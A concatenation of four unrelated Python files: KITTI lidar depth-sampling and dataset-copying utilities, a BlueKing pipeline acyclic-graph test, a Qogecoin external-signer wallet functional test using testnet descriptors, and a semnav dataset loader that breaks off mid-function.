return (np.array([]), prob_only_valid, x)
if budget > prob_only_valid[prob_only_valid > 0].shape[0]: # not enough pixels in prob_map (not much difference between predictors). We'll have to take some random samples because
budget_prob = prob_only_valid[prob_only_valid > 0].shape[0]
budget_rand = budget - budget_prob # prob map == 0 for them
print("Warning: lidar_choose: only {} different valid pixels to sample from (probability map is zero elsewhere). {} remaining samples will be taken randomly uniform from {} "
"valid pixels".format(budget_prob, budget_rand, good_inds-budget_prob))
if budget_prob != 0: # samples based on the probability map
prob_only_valid = prob_only_valid / s
if pm_greedy == 'pm':
inds1 = np.random.choice(n, budget_prob, False, prob_only_valid) # len(inds) = budget. Choose budget numbers from n array (np.arange(n)),
# based on the probabilities prob. No replacements
else: # greedy-MAX
inds1 = np.argpartition(prob_only_valid, -budget_prob)[-budget_prob:] # get 'budget' max indices of 'prob'
valid_mask[inds1] = 0 # remove indices we took already
else: # we'll take only random (everything valid is zeros)
prob_only_valid = np.array([]) # we don't have valid prob map
inds1 = np.array([]).astype('int')
# sample randomly - no matter PM or greedy (all have the same weights - uniform)
valid_mask[valid_mask > 0] = 1
valid_mask[valid_mask < 0] = 0
valid_mask = valid_mask / valid_mask.sum() # uniform
inds2 = np.random.choice(n, budget_rand, False, valid_mask)
return (np.concatenate([inds1, inds2]), prob_only_valid, x)
else: # enough pixels in prob_map
prob_only_valid = prob_only_valid / s
if pm_greedy == 'pm':
inds = np.random.choice(n, budget, False, prob_only_valid)
else: # greedy-MAX
inds = np.argpartition(prob_only_valid, -budget)[-budget:]
return (inds, prob_only_valid, x)
"""
Saves depth image as uint16
"""
def depth_write(filename, img):
img[img < 0] = 0 # negative depth is like 0 depth
img = img * 256
if np.max(img) >= 2 ** 16:
print('Warning: {} pixels in {} have depth >= 2**16 (max is: {}).Truncating before saving.'.format(img[img >= 2**16].shape[0], "/".join(filename.split('/')[-5:]), np.max(img)))
img = np.minimum(img, 2 ** 16 - 1)
img = img.astype('uint16')
cv2.imwrite(filename, img)
"""
Loads depth map D from png file and returns it as a numpy array,
"""
def depth_read(filename):
depth_png = np.array(Image.open(filename), dtype=int)
# make sure we have a proper 16bit depth map here.. not 8bit!
if np.max(depth_png) > 65536: # not relevant for debug (when NNs don't predict good depth), leading to 0.9m in all of the image, resulting this error OR when we insert black image to the NN
print("warning: max depth {} in while reading image{} in depth_read".format(np.max(depth_png), filename))
depth = depth_png.astype(np.float) / 256.
depth[depth_png == 0] = -1.
return depth
"""
Given a kitti dir, and a type ('train'/'val'), return a list of drives and a map from drive name to the number of images in the drive. The number of images is 2* the number in the image_02 dir
"""
def get_train_val_drive_list(src_path, dir_type):
assert (dir_type in train_and_val())
dirname = src_path + '/' + get_train_val_type_dirs()[0] + '/' + dir_type # takes data_depth_annotated
drives = os.listdir(dirname)
img_count = {}
for drive in drives:
g = Path(dirname + '/' + drive).rglob('*.png')
img_count[drive] = len(list(g))
drives = list(img_count.keys())
return (drives, img_count)
"""
Copy some of the drives in the train or val
Inputs:
src_path - for example, the full kitti
dest_path - a partial kitti being built
drive_list - a list of drive directories (e.g. '2011_09_26_drive_0001_sync'). the list is unique.
set_type - 'train' or 'val'
dirs - if None, all the 3 top dirs (get_train_val_type_dirs()). otherwise, a subset of those.
IMPORTANT: dirs = None is intended for building a new directory from scratch, and will not allow
stepping on existing content. dirs != None is intended for such stepping and will allow it.
The user is then responsible for keeping directory valid (same drives in all)
if drives do not exist, a warning will be printed.
"""
def copy_partial_train_val(src_path, dest_path, drive_list, set_type, dirs=None):
assert (set_type in train_and_val())
if dirs is None:
dirs = get_train_val_type_dirs()
dirs_exist_ok = False
else:
assert (len(dirs) > 0)
for dir in dirs:
assert (dir in get_train_val_type_dirs())
dirs_exist_ok = True
# make list of unique values
drive_list = list(set(drive_list))
for drive in drive_list:
success = True
for dir in dirs:
cur_src = os.path.join(src_path, dir, set_type, drive)
cur_dest = os.path.join(dest_path, dir, set_type, drive)
if os.path.isdir(cur_src) == False:
success = False
else:
# make sure we are replacing an existing directory
if dirs_exist_ok == True:
assert (os.path.isdir(cur_dest) == True)
shutil.rmtree(cur_dest)
shutil.copytree(cur_src, cur_dest)
if success == False:
print('Warning: invalid drive ' + drive)
"""
Create the kitti skeleton - all dirs (without the drives), no data. root_path string must be new (it will create the folder itself)
"""
def create_dir_tree_skeleton(root_path, example_path):
if os.path.exists(root_path) == True:
print('path ' + root_path + ' already exists. Exiting.')
return
if os.path.isdir(example_path) == False:
print(example_path + 'is not a directory or does not exist. Exiting.')
return
for dir in get_train_val_type_dirs():
for subdir in train_and_val_and_test():
dirname = root_path + '/' + dir + '/' + subdir
os.makedirs(dirname)
for root, dirs, files in os.walk(example_path + '/depth_selection'):
for name in dirs:
dirname = root_path + '/' + root[len(example_path) + 1:] + '/' + name
os.makedirs(dirname)
def train_and_val():
return ['train', 'val']
def train_and_val_and_test():
return ['train', 'val', 'test']
"""
Divide drives to minisets. itereate on drives in descending number of images, and allocate drive to the miniset (with the demand of a minimum size of a set).
Continue until all sets have at least min_imgs_per_set for the first time (return success/failure). When a set is reaching min_imgs - no more will be added
(in addition, the count is for the ground truth - 10 fewer than the rgb...).
Inputs:
src_path, dir_type - as in get_train_val_drive_list
add_descending - True is good for the whole set/big portion of it. If False, good for creating small mini sets (for small runs)
"""
def divide_drives_to_mini_sets(n_sets, min_imgs_per_set, src_path, dir_type, add_descending=True):
drives, img_count = get_train_val_drive_list(src_path, dir_type)
keys = list(img_count.keys())
values = list(img_count.values())
order = np.argsort(np.array(list(values)))
drives_sorted_by_nums = []
nums_sorted = sorted(values)
success = False
for i in range(order.shape[0]):
drives_sorted_by_nums.append(keys[order[i]])
sets = [[] for i in range(n_sets)]
sizes = np.zeros(n_sets, dtype='int')
indices = np.arange(0, len(nums_sorted))
if add_descending == True: # bigger syncs first
indices = indices[::-1]
for i in indices:
smallest = np.argmin(sizes)
if sizes[smallest] >= min_imgs_per_set:
success = True
break
sets[smallest].append(drives_sorted_by_nums[i])
sizes[smallest] += nums_sorted[i]
return (sets, sizes, success)
"""
return the names of the directories with train/val subdirectories
"""
def get_train_val_type_dirs():
return ['data_depth_annotated', 'data_depth_velodyne', 'data_rgb']
"""
Given a directory name (user's responsibility that it is a directory), return the elements in a-b order.
"""
def get_sorted_ls(src_path):
return sorted(os.listdir(src_path))
"""
Copy files in val_selection_cropped folder
Inputs:
src_path - for example, the full kitti
dest_path - a partial kitti being built
subset_params - either a range or a drive list. if range, get a list [start,end] and copy files start:end in alphabetical order, where the range must be valid
(from 0 to n, where n is # of total files). otherwise expects a list of drives (e.g. '2011_09_26_drive_0001_sync'), and takes files from these drives. the list is uniqued.
if drives do not exist, a warning will be printed.
"""
def copy_partial_val_selection_cropped(src_path, dest_path, subset_params):
vsc_suf = os.path.join('depth_selection', 'val_selection_cropped')
# find if params specify range or drive list
if len(subset_params) > 0:
dirnames = os.listdir(
os.path.join(src_path, vsc_suf)) # ['velodyne_raw', 'image', 'groundtruth_depth', 'intrinsics']
if type(subset_params[0]) != type(str()): # images range
n = len(os.listdir(os.path.join(src_path, vsc_suf, dirnames[0]))) # number of files inside 'velodyne_raw' folder. Should be 1000
start, end = subset_params
if start < 0 or end > n:
sys.exit('copy_partial_val_selection_cropped: invalid range') # probably there are not enough images to copy
for dirname in dirnames:
for filename in get_sorted_ls(os.path.join(src_path, vsc_suf, dirname))[start:end]:
shutil.copyfile(os.path.join(src_path, vsc_suf, dirname, filename),
os.path.join(dest_path, vsc_suf, dirname, filename))
else: # drive list
drive_list = list(set(subset_params)) # make unique
for drive in drive_list:
found = False
for filename in Path(os.path.join(src_path, vsc_suf)).rglob(drive + '*'):
found = True
strname = str(filename)
shutil.copyfile(strname, os.path.join(dest_path, strname[len(src_path) + 1:]))
if found == False:
print('Warning: invalid drive: ' + drive)
else:
assert 1, 'invalid params'
"""
Copy files and dirs (recursive). If dest exists, will succeed for files but not for dirs. If fails, calls sys.exit().
"""
def copypath(src, dest, overwrite_dest_dir=False):
if os.path.isdir(src):
try:
if overwrite_dest_dir and os.path.exists(dest):
shutil.rmtree(dest)
shutil.copytree(src, dest)
except:
sys.exit('FAILED copytree. Exiting.')
else:
try:
shutil.copyfile(src, dest)
except:
sys.exit('FAILED copyfile. Exiting.')
"""
Replace (overwrite) existing depth images with empty (zeros) ones - on KITTI folders tree
"""
def apply_empty_d_maps_to_data(src_path_to_overwrite):
start_time = time.time()
apply_empty_d_maps_to_directory(os.path.join(src_path_to_overwrite, 'data_depth_velodyne'))
apply_empty_d_maps_to_directory(os.path.join(src_path_to_overwrite, 'depth_selection', 'val_selection_cropped', 'velodyne_raw'))
print("Finished after {:.2f} hours".format((time.time() - start_time) / 3600))
def apply_empty_d_maps_to_directory(dirpath):
print("number of images in folder {}: ".format(dirpath), flush=True)
os.system('find ' + dirpath + ' -name \'*.png\' | wc -l') # we'll get 0 when trying to deal with val_select that is not in mini-set 1 (because they should not be there - so it's ok)
empty_map = np.zeros((352, 1216), dtype=int)
for filename in Path(dirpath).rglob('*.png'):
strname = str(filename)
depth_write(strname, empty_map)
"""
Can show or save current probability maps (based on the variance map from the predictions) & the current samples on the rgb image
"""
def show_prob_map_and_sampling_indices_on_image(phase, rgb_path, samples_map, prob_map, x_gt_valid, show_results=False, save_results=False):
rgb = rgb_read(rgb_path)
m = rgb.shape[0] - 352
n = int(round((rgb.shape[1] - 1216) / 2.))
rgb = rgb[m:(m + 352), n:(n + 1216), :]
samples_on_image = show_img_effect(rgb, samples_map, enlarge_samples=True)
cmap = plt.cm.get_cmap("jet") # color map name. Red is higher, blue is lower
if save_results == True:
path = '../data_new/phase_' + str(phase + 1) + '/' + rgb_path.split('/')[3] + '/prob_and_sampling_maps_results' + rgb_path.split('data_rgb')[1]
os.makedirs(os.path.dirname(path), exist_ok=True)
samples_on_image = (255 * samples_on_image).astype('uint8')
im = Image.fromarray(samples_on_image)
im.save(path.split('.png')[0] + '_samples.png')
prob_gt_valid = (x_gt_valid - x_gt_valid.min()) / (x_gt_valid.max() - x_gt_valid.min())
# depth_write(path.split('.png')[0] + '_prob_gt_valid.png', prob_gt_valid) # real values (rather than visualization - in the next lines)
colored_prob_valid_map = cmap(prob_gt_valid) # apply the colormap, will result 4-channel image (R,G,B,A) in float [0,1]
im = Image.fromarray((colored_prob_valid_map[:, :, :3] * 255).astype(np.uint8)) # convert to RGB in uint8
im.save(path.split('.png')[0] + '_prob_gt_valid.png')
# np.save(path.split('.png')[0] + '_prob.npy', prob_map) # real values (rather than visualization - in the next lines)
prob_map = (prob_map - prob_map.min()) / (prob_map.max() - prob_map.min())
# depth_write(path.split('.png')[0] + '_prob.png', prob_map) # real values (rather than visualization - in the next lines)
colored_prob_map = cmap(prob_map) # apply the colormap, will result 4-channel image (R,G,B,A) in float [0,1]
im = Image.fromarray((colored_prob_map[:, :, :3] * 255).astype(np.uint8)) # convert to RGB in uint8
im.save(path.split('.png')[0] + '_prob.png')
if show_results == True:
plt.close()
plt.figure(1)
plt.imshow(samples_on_image)
plt.figure(2)
plt.imshow(prob_map)
"""
Combine the original image and an effect of interest into a single image.
Inputs:
rgb: original image HxWx3
effect: image HxW
enlarge_samples: if the effect is a sample map - will enlarge each pixel by 4 different directions: up, down, left, right (for better view later on).
is it only for display purposes because it's changing the data
gs: gray scale image. when given - what 'rgb' argument is non relevant
jet_mode: relevant only for gs. will shot the image in JET colormap, and the effect will show on top of it. Use it only for data that you don't
care for the values of the pixels, just if there is data or not (binary). Excellent for sample map as effect
previous_effect: relevant only when the effect is samples. We'll use the previous_effect to determine what are the new samples
Outputs:
img - returns the effected image.
"""
def show_img_effect(rgb, effect, enlarge_samples=False, gs=None, jet_mode=False, previous_effect=None):
# normalize to [0, 1]
if effect.min() == effect.max(): # no effect at all
effect = np.zeros(effect.shape)
else:
effect = (effect - np.min(effect)) / (np.max(effect) - np.min(effect))
if previous_effect is not None:
if previous_effect.min() == previous_effect.max(): # no effect at all
previous_effect = np.zeros(previous_effect.shape)
else:
previous_effect = (previous_effect - np.min(previous_effect)) / (np.max(previous_effect) - np.min(previous_effect))
# enlarge a pixel to a '+' sign (on top of the image) - to make it clearer to the viewer
if enlarge_samples == True:
if previous_effect is not None:
effect = effect - previous_effect # only what's new
add_to_right = np.roll(previous_effect, 1, axis=1) # cyclic shift 1 column to the right
add_to_right[:, 0] = 0 # ignore leftmost col (due to cyclic)
add_to_left = np.roll(previous_effect, -1, axis=1) # 1 column to the left
add_to_left[:, -1] = 0 # ignore rightmost col
add_to_up = np.roll(previous_effect, -1, axis=0) # 1 row up
add_to_up[-1, :] = 0 # ignore lower row
add_to_down = np.roll(previous_effect, 1, axis=0) # 1 row down
add_to_down[0, :] = 0 # ignore upper row
previous_effect = previous_effect + add_to_right + add_to_left + add_to_up + add_to_down
add_to_right = np.roll(effect, 1, axis=1) # cyclic shift 1 column to the right
add_to_right[:, 0] = 0 # ignore leftmost col (due to cyclic)
add_to_left = np.roll(effect, -1, axis=1) # 1 column to the left
add_to_left[:, -1] = 0 # ignore rightmost col
add_to_up = np.roll(effect, -1, axis=0) # 1 row up
add_to_up[-1, :] = 0 # ignore lower row
add_to_down = np.roll(effect, 1, axis=0) # 1 row down
add_to_down[0, :] = 0 # ignore upper row
effect = effect + add_to_right + add_to_left + add_to_up + add_to_down
if gs is None: # rgb image
assert (rgb.shape[0:2] == effect.shape)
if np.max(rgb) > 1.:
rgb = rgb / 255. # to [0, 1]
gs = np.dot(rgb, [0.299, 0.587, 0.114]) # the ratios between channels. need to sum up to 1 in order to get a true gray scale
img = np.zeros(rgb.shape)
else: # gray scale image
img = np.zeros((gs.shape[0], gs.shape[1], 3))
gs = (gs - np.min(gs)) / (np.max(gs) - np.min(gs)) # to [0, 1]
if jet_mode == True: # only possible in with gs
cmap = plt.cm.get_cmap("jet")
colored_gs = cmap(gs)[:, :, :3] # apply the colormap + take only RGB in float [0,1]
if previous_effect is not None:
(colored_gs[:, :, 0])[previous_effect > 0] = 0.45 # the old sample points will be gray-ish. this won't show value, but a binary - there is a data, or not
(colored_gs[:, :, 1])[previous_effect > 0] = 0.45
(colored_gs[:, :, 2])[previous_effect > 0] = 0.45
(colored_gs[:, :, 0])[effect > 0] = 1 # the new sample points will be white. this won't show value, but a binary - there is a data, or not
(colored_gs[:, :, 1])[effect > 0] = 1
(colored_gs[:, :, 2])[effect > 0] = 1
return colored_gs
img[:, :, 0] = effect
img[:, :, 1] = gs
return img
"""
Get the name of the NN weights, from an output file.
"""
def read_weights(file_path, phases, predictors):
if file_path == "": # we are not inferencing
return []
weights = []
NN_in_stage = []
with open(file_path) as f:
lines = f.read().splitlines()
for line in lines:
if line != "": # as long as we don't encounter empty line (means a new stage)
NN_in_stage.append(line)
else:
weights.append(NN_in_stage)
NN_in_stage = []
weights.append(NN_in_stage) # final net
for phase in range(len(weights) - 2):
assert len(weights[phase]) == len(weights[phase+1]), "read_weights: number of weights isn't match between phases"
assert len(weights[-1]) == 1, "read_weights: there should be 1 final net weights"
assert phases == len(weights)-1, "read_weights: given argument K isn't match to the number of given phases in .txt"
assert len(weights[0]) == predictors, "read_weights: given argument M isn't match to the number of given weights inside each phase in .txt"
print("Detects {} weights in each phase, total {} phases, in addition to {} final net weights\n".format(len(weights[0]), len(weights)-1, len(weights[-1])))
return weights |
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
from __future__ import absolute_import
from copy import deepcopy
from django.test import TestCase
from pipeline_web.constants import PWE
from pipeline_web.drawing_new.normalize import normalize_run, normalize_undo
from pipeline_web.drawing_new import acyclic
from pipeline_web.drawing_new.utils import add_flow_id_to_node_io
from pipeline_web.tests.drawing_new.data import pipeline_with_circle
class TestAcyclic(TestCase):
def setUp(self):
self.pipeline = deepcopy(pipeline_with_circle)
def test_remove_self_flows(self):
normalize_run(self.pipeline)
self.assertEqual(acyclic.remove_self_edges(self.pipeline), {})
edges = {
'self_edge0': {
PWE.source: list(self.pipeline[PWE.activities].keys())[0],
PWE.target: list(self.pipeline[PWE.activities].keys())[0],
},
'self_edge1': {
PWE.source: list(self.pipeline[PWE.activities].keys())[1],
PWE.target: list(self.pipeline[PWE.activities].keys())[1],
}
}
self.pipeline[PWE.flows].update(edges)
add_flow_id_to_node_io(list(self.pipeline[PWE.activities].values())[0], 'self_edge0', PWE.incoming)
add_flow_id_to_node_io(list(self.pipeline[PWE.activities].values())[0], 'self_edge0', PWE.outgoing)
add_flow_id_to_node_io(list(self.pipeline[PWE.activities].values())[1], 'self_edge1', PWE.incoming)
add_flow_id_to_node_io(list(self.pipeline[PWE.activities].values())[1], 'self_edge1', PWE.outgoing)
self.assertEqual(acyclic.remove_self_edges(self.pipeline), edges)
normalize_undo(self.pipeline)
self.assertEqual(self.pipeline, pipeline_with_circle)
def test_insert_self_edges(self):
edges = {
'self_edge0': {
PWE.source: list(self.pipeline[PWE.activities].keys())[0],
PWE.target: list(self.pipeline[PWE.activities].keys())[0],
},
'self_edge2': {
PWE.source: list(self.pipeline[PWE.activities].keys())[1],
PWE.target: list(self.pipeline[PWE.activities].keys())[1],
}
}
normalize_run(self.pipeline)
acyclic.insert_self_edges(self.pipeline, edges)
normalize_undo(self.pipeline)
edges.update(self.pipeline[PWE.flows])
self.assertEqual(self.pipeline[PWE.flows], edges)
def test_acyclic_run(self):
normalize_run(self.pipeline)
reversed_flows = acyclic.acyclic_run(self.pipeline)
assert_data = deepcopy(pipeline_with_circle)
assert_flow = assert_data[PWE.flows]['line77a6cd587ff8476e75354c1d9469']
assert_flows = {
'line77a6cd587ff8476e75354c1d9469': deepcopy(assert_flow)
}
assert_data[PWE.activities][assert_flow[PWE.target]].update({
PWE.incoming: ['linede15c52c74c1f5f566450d2c975a'],
PWE.outgoing: ['line8602a85ef7e511765b77bc9f05e0', 'line77a6cd587ff8476e75354c1d9469']
})
assert_data[PWE.activities][assert_flow[PWE.source]].update({
PWE.incoming: ['line7ac5fc7341c9ccbf773e9ca0c9cf', 'line77a6cd587ff8476e75354c1d9469'],
PWE.outgoing: ''
})
assert_flow.update({
PWE.source: assert_flow[PWE.target],
PWE.target: assert_flow[PWE.source]
})
self.assertEqual(reversed_flows, assert_flows)
normalize_undo(self.pipeline)
self.assertEqual(self.pipeline, assert_data)
def test_acyclic_undo(self):
normalize_run(self.pipeline)
reversed_flows = acyclic.acyclic_run(self.pipeline)
acyclic.acyclic_undo(self.pipeline, reversed_flows)
normalize_undo(self.pipeline)
self.assertEqual(self.pipeline, pipeline_with_circle)
|
#!/usr/bin/env python3
# Copyright (c) 2017-2021 The Bitcoin and Qogecoin Core Authors
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test external signer.
Verify that a qogecoind node can use an external signer command
See also rpc_signer.py for tests without wallet context.
"""
import os
import platform
from test_framework.test_framework import QogecoinTestFramework
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
)
class WalletSignerTest(QogecoinTestFramework):
def mock_signer_path(self):
path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'mocks', 'signer.py')
if platform.system() == "Windows":
return "py " + path
else:
return path
def mock_invalid_signer_path(self):
path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'mocks', 'invalid_signer.py')
if platform.system() == "Windows":
return "py " + path
else:
return path
def set_test_params(self):
self.num_nodes = 2
# The experimental syscall sandbox feature (-sandbox) is not compatible with -signer (which
# invokes execve).
self.disable_syscall_sandbox = True
self.extra_args = [
[],
[f"-signer={self.mock_signer_path()}", '-keypool=10'],
]
def skip_test_if_missing_module(self):
self.skip_if_no_external_signer()
self.skip_if_no_wallet()
def set_mock_result(self, node, res):
with open(os.path.join(node.cwd, "mock_result"), "w", encoding="utf8") as f:
f.write(res)
def clear_mock_result(self, node):
os.remove(os.path.join(node.cwd, "mock_result"))
def run_test(self):
self.test_valid_signer()
self.restart_node(1, [f"-signer={self.mock_invalid_signer_path()}", "-keypool=10"])
self.test_invalid_signer()
def test_valid_signer(self):
self.log.debug(f"-signer={self.mock_signer_path()}")
# Create new wallets for an external signer.
# disable_private_keys and descriptors must be true:
assert_raises_rpc_error(-4, "Private keys must be disabled when using an external signer", self.nodes[1].createwallet, wallet_name='not_hww', disable_private_keys=False, descriptors=True, external_signer=True)
if self.is_bdb_compiled():
assert_raises_rpc_error(-4, "Descriptor support must be enabled when using an external signer", self.nodes[1].createwallet, wallet_name='not_hww', disable_private_keys=True, descriptors=False, external_signer=True)
else:
assert_raises_rpc_error(-4, "Compiled without bdb support (required for legacy wallets)", self.nodes[1].createwallet, wallet_name='not_hww', disable_private_keys=True, descriptors=False, external_signer=True)
self.nodes[1].createwallet(wallet_name='hww', disable_private_keys=True, descriptors=True, external_signer=True)
hww = self.nodes[1].get_wallet_rpc('hww')
assert_equal(hww.getwalletinfo()["external_signer"], True)
# Flag can't be set afterwards (could be added later for non-blank descriptor based watch-only wallets)
self.nodes[1].createwallet(wallet_name='not_hww', disable_private_keys=True, descriptors=True, external_signer=False)
not_hww = self.nodes[1].get_wallet_rpc('not_hww')
assert_equal(not_hww.getwalletinfo()["external_signer"], False)
assert_raises_rpc_error(-8, "Wallet flag is immutable: external_signer", not_hww.setwalletflag, "external_signer", True)
# assert_raises_rpc_error(-4, "Multiple signers found, please specify which to use", wallet_name='not_hww', disable_private_keys=True, descriptors=True, external_signer=True)
# TODO: Handle error thrown by script
# self.set_mock_result(self.nodes[1], "2")
# assert_raises_rpc_error(-1, 'Unable to parse JSON',
# self.nodes[1].createwallet, wallet_name='not_hww2', disable_private_keys=True, descriptors=True, external_signer=False
# )
# self.clear_mock_result(self.nodes[1])
assert_equal(hww.getwalletinfo()["keypoolsize"], 30)
address1 = hww.getnewaddress(address_type="bech32")
assert_equal(address1, "bcrt1qm90ugl4d48jv8n6e5t9ln6t9zlpm5th68x4f8g")
address_info = hww.getaddressinfo(address1)
assert_equal(address_info['solvable'], True)
assert_equal(address_info['ismine'], True)
assert_equal(address_info['hdkeypath'], "m/84'/1'/0'/0/0")
address2 = hww.getnewaddress(address_type="p2sh-segwit")
assert_equal(address2, "2N2gQKzjUe47gM8p1JZxaAkTcoHPXV6YyVp")
address_info = hww.getaddressinfo(address2)
assert_equal(address_info['solvable'], True)
assert_equal(address_info['ismine'], True)
assert_equal(address_info['hdkeypath'], "m/49'/1'/0'/0/0")
address3 = hww.getnewaddress(address_type="legacy")
assert_equal(address3, "n1LKejAadN6hg2FrBXoU1KrwX4uK16mco9")
address_info = hww.getaddressinfo(address3)
assert_equal(address_info['solvable'], True)
assert_equal(address_info['ismine'], True)
assert_equal(address_info['hdkeypath'], "m/44'/1'/0'/0/0")
self.log.info('Test walletdisplayaddress')
result = hww.walletdisplayaddress(address1)
assert_equal(result, {"address": address1})
# Handle error thrown by script
self.set_mock_result(self.nodes[1], "2")
assert_raises_rpc_error(-1, 'RunCommandParseJSON error',
hww.walletdisplayaddress, address1
)
self.clear_mock_result(self.nodes[1])
self.log.info('Prepare mock PSBT')
self.nodes[0].sendtoaddress(address1, 1)
self.generate(self.nodes[0], 1)
# Load private key into wallet to generate a signed PSBT for the mock
self.nodes[1].createwallet(wallet_name="mock", disable_private_keys=False, blank=True, descriptors=True)
mock_wallet = self.nodes[1].get_wallet_rpc("mock")
assert mock_wallet.getwalletinfo()['private_keys_enabled']
result = mock_wallet.importdescriptors([{
"desc": "wpkh([00000001/84'/1'/0']tprv8ZgxMBicQKsPd7Uf69XL1XwhmjHopUGep8GuEiJDZmbQz6o58LninorQAfcKZWARbtRtfnLcJ5MQ2AtHcQJCCRUcMRvmDUjyEmNUWwx8UbK/0/*)#rweraev0",
"timestamp": 0,
"range": [0,1],
"internal": False,
"active": True
},
{
"desc": "wpkh([00000001/84'/1'/0']tprv8ZgxMBicQKsPd7Uf69XL1XwhmjHopUGep8GuEiJDZmbQz6o58LninorQAfcKZWARbtRtfnLcJ5MQ2AtHcQJCCRUcMRvmDUjyEmNUWwx8UbK/1/*)#j6uzqvuh",
"timestamp": 0,
"range": [0, 0],
"internal": True,
"active": True
}])
assert_equal(result[0], {'success': True})
assert_equal(result[1], {'success': True})
assert_equal(mock_wallet.getwalletinfo()["txcount"], 1)
dest = self.nodes[0].getnewaddress(address_type='bech32')
mock_psbt = mock_wallet.walletcreatefundedpsbt([], {dest:0.5}, 0, {}, True)['psbt']
mock_psbt_signed = mock_wallet.walletprocesspsbt(psbt=mock_psbt, sign=True, sighashtype="ALL", bip32derivs=True)
mock_psbt_final = mock_wallet.finalizepsbt(mock_psbt_signed["psbt"])
mock_tx = mock_psbt_final["hex"]
assert(mock_wallet.testmempoolaccept([mock_tx])[0]["allowed"])
# # Create a new wallet and populate with specific public keys, in order
# # to work with the mock signed PSBT.
# self.nodes[1].createwallet(wallet_name="hww4", disable_private_keys=True, descriptors=True, external_signer=True)
# hww4 = self.nodes[1].get_wallet_rpc("hww4")
#
# descriptors = [{
# "desc": "wpkh([00000001/84'/1'/0']tpubD6NzVbkrYhZ4WaWSyoBvQwbpLkojyoTZPRsgXELWz3Popb3qkjcJyJUGLnL4qHHoQvao8ESaAstxYSnhyswJ76uZPStJRJCTKvosUCJZL5B/0/*)#x30uthjs",
# "timestamp": "now",
# "range": [0, 1],
# "internal": False,
# "watchonly": True,
# "active": True
# },
# {
# "desc": "wpkh([00000001/84'/1'/0']tpubD6NzVbkrYhZ4WaWSyoBvQwbpLkojyoTZPRsgXELWz3Popb3qkjcJyJUGLnL4qHHoQvao8ESaAstxYSnhyswJ76uZPStJRJCTKvosUCJZL5B/1/*)#h92akzzg",
# "timestamp": "now",
# "range": [0, 0],
# "internal": True,
# "watchonly": True,
# "active": True
# }]
# result = hww4.importdescriptors(descriptors)
# assert_equal(result[0], {'success': True})
# assert_equal(result[1], {'success': True})
assert_equal(hww.getwalletinfo()["txcount"], 1)
assert(hww.testmempoolaccept([mock_tx])[0]["allowed"])
with open(os.path.join(self.nodes[1].cwd, "mock_psbt"), "w", encoding="utf8") as f:
f.write(mock_psbt_signed["psbt"])
self.log.info('Test send using hww1')
res = hww.send(outputs={dest:0.5},options={"add_to_wallet": False})
assert(res["complete"])
assert_equal(res["hex"], mock_tx)
self.log.info('Test sendall using hww1')
res = hww.sendall(recipients=[{dest:0.5}, hww.getrawchangeaddress()],options={"add_to_wallet": False})
assert(res["complete"])
assert_equal(res["hex"], mock_tx)
# # Handle error thrown by script
# self.set_mock_result(self.nodes[4], "2")
# assert_raises_rpc_error(-1, 'Unable to parse JSON',
# hww4.signerprocesspsbt, psbt_orig, "00000001"
# )
# self.clear_mock_result(self.nodes[4])
def test_invalid_signer(self):
self.log.debug(f"-signer={self.mock_invalid_signer_path()}")
self.log.info('Test invalid external signer')
assert_raises_rpc_error(-1, "Invalid descriptor", self.nodes[1].createwallet, wallet_name='hww_invalid', disable_private_keys=True, descriptors=True, external_signer=True)
if __name__ == '__main__':
WalletSignerTest().main()
|
from __future__ import print_function
import os
from semnav.config import get_config
from semnav.dataset.frame_by_frame_dataset import FrameByFrameDataset
from semnav.dataset.temporal_dataset import TemporalDataset
from semnav.dataset.graph_net_dataset import GraphNetDataset
from semnav.dataset.graph_net_frame_dataset import GraphNetFrameDataset
from torch.utils.data import ConcatDataset
def load_dataset(data_dir, cfg):
"""Load a dataset given a parsed rosbag directory.
Args:
data_dir: Full path to the data directory.
cfg: Configuration.
"""
print(' Loading:', data_dir)
if cfg.dataset_type == 'frame_by_frame':
return FrameByFrameDataset(data_dir, first_n_in_sequence=cfg.first_n_frames,
remove_last_n_in_sequence=cfg.remove_last_n_frames,
behavior_ids=cfg.behavior_id, valid_only=cfg.valid_only)
elif cfg.dataset_type == 'temporal':
return TemporalDataset(data_dir, temporal_dilation=cfg.temporal_dilation,
n_frames_per_sample=cfg.n_frames_per_sample,
first_n_in_sequence=cfg.first_n_frames,
remove_last_n_in_sequence=cfg.remove_last_n_frames,
behavior_ids=cfg.behavior_id, valid_only=cfg.valid_only)
elif cfg.dataset_type == 'graph_net':
return GraphNetDataset(data_dir, temporal_dilation=cfg.temporal_dilation,
n_frames_per_sample=cfg.n_frames_per_sample,
first_n_in_sequence=cfg.first_n_frames,
remove_last_n_in_sequence=cfg.remove_last_n_frames,
behavior_ids=cfg.behavior_id, valid_only=cfg.valid_only)
elif cfg.dataset_type == 'single_frame_graph_net':
return GraphNetFrameDataset(data_dir, first_n_in_sequence=cfg.first_n_frames,
remove_last_n_in_sequence=cfg.remove_last_n_frames,
behavior_ids=cfg.behavior_id, valid_only=cfg.valid_only)
else:
raise ValueError('Please select a valid dataset type')
def load_dataset_splits(bag_dir_name, cfg):
"""Load the train/val/test splits as Datasets for a parsed bag directory.
Args:
bag_dir_name: Name of bag/directory under cfg.dataset_root.
cfg: Configuration.
"""
processed_bag_dir = os.path.join(cfg.dataset_root, bag_dir_name)
train_set = load_dataset(os.path.join(processed_bag_dir, 'train'), cfg)
val_set = load_dataset(os.path.join(processed_bag_dir, 'val'), cfg)
test_set = load_dataset(os.path.join(processed_bag_dir, 'test'), cfg)
return train_set, val_set, test_set
def concat_datasets(bag_names, cfg):
"""Combine the train, val, and test sets from each parsed bag directory.
Args:
bag_names: List of bag/directory names under cfg.dataset_root.
cfg: Configuration.
"""
train_sets, val_sets, test_sets = ([], [], [])
for bag_name in bag_names:
